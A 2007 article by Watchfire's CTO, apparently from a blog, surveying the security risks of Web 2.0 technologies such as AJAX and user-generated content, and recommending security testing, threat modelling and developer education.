December 08, 2007

The security implications of Web 2.0

A car that has less options has fewer things that can break. Power steering, power locks, power seats, seat warmers, and the myriad of other car features provide a better experience, but they also have more items that require maintenance.

Michael Weider, CTO and Founder, WatchfireMichael Weider, CTO and Founder, Watchfire

The same complexities we see with a fully loaded car apply to web functionality. Web 2.0 has arrived, and the race to adopt it has brought with it collaborative online environments—socially driven content that is both redefining how web applications are developed and how they are used. The result is a richer, more fulfilling web experience. The consequence however is that the dynamic new Web 2.0 design principals open a host of new means for attack by which Web 2.0-based web applications are vulnerable.

With the explosion of Web 2.0 concepts powering more and more websites, the web is reaching new potentials for interactivity. But with that progress it becomes even more important to proactively address the heightened security and privacy vulnerabilities, as the same technologies that make for a more user-friendly web, can also make for less secure web applications.

This article will highlight the most common Web 2.0 vulnerabilities that privacy and security professionals need to be aware of, including better understanding for how Web services and AJAX can be exploited and the attacks that they can enable. Readers will also learn tips and best practices for securing next-generation applications that can be applied immediately as enterprises continue the push to deploy Web 2.0, ensuring they can meet both current and future online security challenges.

What is Web 2.0?
Web 2.0 carries a high profile and surrounding hype. There is increasing pressure on developers to quickly adopt this new second generation of dynamic, interactive and simple by design technologies. Web 2.0 can be described in two ways:

1) New ways to build rich web sites.
Often not characterized as Web 2.0, Asynchronous JavaScript (AJAX) and other new rapid application development techniques are en vogue to create rich web sites that are highly interactive and more easily deployed and used.

AJAX delivers a rich user interface by displaying more dynamic content. Another common technique is Real Simple Syndications feeds (RSS), an XML based standard that allows subscribers to promote information feeds. This is most commonly used to subscribe to blogs and news articles.

2) Socially driven content.
Think MySpace.com. The web experience is now defined by community and by content created and posted by web users. Websites are now amorphous entities, and their vitality is defined by the people who visit them.

In the last couple of years, the web has moved from a collection of static pages to a more interactive and dynamic environment. This shift has been heralded as Web 2.0 and has given more users more power. No longer is the web a place where only technical folks can produce content. Instead, with the click of a button non-technical users from children to seniors are able to upload information to personal or corporate sites, produce interactive pages or share content. Popular dynamic sites such as YouTube, MySpace and Flickr are the poster children for this new web world.

Why adopt Web 2.0 technologies?
Competition and ease-of-use are at the top of the list as reasons why Web 2.0 is attractive. Like viral marketing, more companies want to communicate more directly to their prospective and current customers. Building sites that include interactive messaging, commenting and user areas allow for more open communication gates. Users can interact with other users and company executives.

Price is also a consideration. Web applications have proven to be more cost effective than their clunky client-server counterparts. Web 2.0 applications, built with Rapid Application Development (RAD) techniques, are built faster and therefore require even less of an investment.

Web 2.0 dangers
With Web 2.0, the functionality and experience of the sites become the primary focus, and the technology empowering the dynamic content is hidden behind the scenes to the average user. Yet the web applications underneath the polished finish remain just as complex, and add a variety of new and often unproven or unsecured technologies to the back end.

In the rush to unveil more interactive sites developers are urged to release functional sites that often lack added security measures. Attackers have quickly learned to exploit the shortcomings in these codes. This has resulted in an urgent need to audit and assess these sites for security vulnerabilities. In order for Web 2.0 technologies to reach full potential, inherent security issues must be recognized and addressed and businesses must incorporate security best practices into application development.

In addition to structural security flaws, there are also user threats including the loading of malicious content. Sites that encourage end user postings typically have no way to stop the uploading of content that might distribute malicious code to other site visitors. In similar ways, other user-driven web sites, including blogs, podcasts and social networking sites, are prone to both security and privacy issues. While it seems as though democracy has come to the Internet, more freedom means increased potential for abuse and errors.

As in our car example, the new features create new avenues for exploit. The majority of Web 1.0 users interacted with single functions on single pages. Now AJAX programming allows any given page to have dozens of features and functions, running independently as well as interacting with each other. This means a fragmentation in communication and the possibility that web application vulnerabilities that have been around for years might increase exponentially. The most common vulnerabilities include SQL injection, cross site scripting (XSS), buffer and SOAP overflow and XML attacks.

The dependence on technology means the new vulnerabilities brought by Web 2.0 are inevitable. Back in the old days of the web—even three or four years ago—users could boost security levels by turning off JavaScript. Doing so now would all but render the website useless. In effect, the user would be disabling the exact tools that make the web useful and efficient.

Why does my organization need to worry about Web 2.0 safety?
Organizations of all sizes and in every market with an internet presence have been attacked. Media reports show regular coverage of the larger companies, such as MySpace suffering from a QuickTime XSS worm, Yahoo Mail recently being hit by a Yamanner worm attack, and even Google’s Gmail has had to overcome XSS problems.

As in any other case of negative publicity there is damage to the brand name and potential lost business if your web applications fail because of security threats. But a greater risk is that sensitive data could be compromised and with that comes everything from minor legal headaches to large and public lawsuits.

How do I protect my web applications?
One of the most effective solutions is to fix weaknesses before they are ever launched. While it sounds like a common sense suggestion, most applications are not built with security in mind.

Overworked developers, who are not trained in security, are not building application level security into the process. As stated, one of the benefits of web applications is the speed to market. But with this comes the downside that long development cycles, which normally include heavy QA and security testing, are discarded in favor of posting applications live as soon as they are functional.

In order to ensure safe and working web applications companies should adhere to strict security testing standards from the development phase through the QA phase of the building cycle. This can be done through use of security scanning tools and penetration tests. And with such a dynamic nature, it’s important to continue periodic post-deployment security testing to monitor the live state of the web site and its ever-changing applications.

Another important but sometimes overlooked suggestion is to monitor metrics on web application vulnerabilities throughout the development cycle. Keep track of all vulnerabilities and fixes. Management can’t address issues they don’t know about.

Monitoring vulnerabilities across the development cycle has a huge impact on the educational front as well. To stop the cycle and reel in control over web application security, developers need to know what mistakes are made so they don’t continue to repeat them. Companies can also set limits on what types of content can be changed or uploaded. An organization’s users can be educated as well, let them know about dangers and how to prevent them while online.

While more user interaction may be the ultimate goal, it’s important to first design threat models in order to determine what levels of risks the company can assume. A retail company’s website, for example, can accept lower security standards for a web application designed to locate a retail store near the user, while a higher security standard is required for the actual e-commerce and credit-card processing applications.

Lastly, Web 2.0 is here to stay, at least until new technology ushers us into the Web 3.0 phase. The trend is racing towards more user interaction and more power to the masses. With that in mind be sure to use technology judiciously and learn how to manage risk with all your website applications.

-Michael Weider is CTO and founder of Watchfire.

clear float

No comments: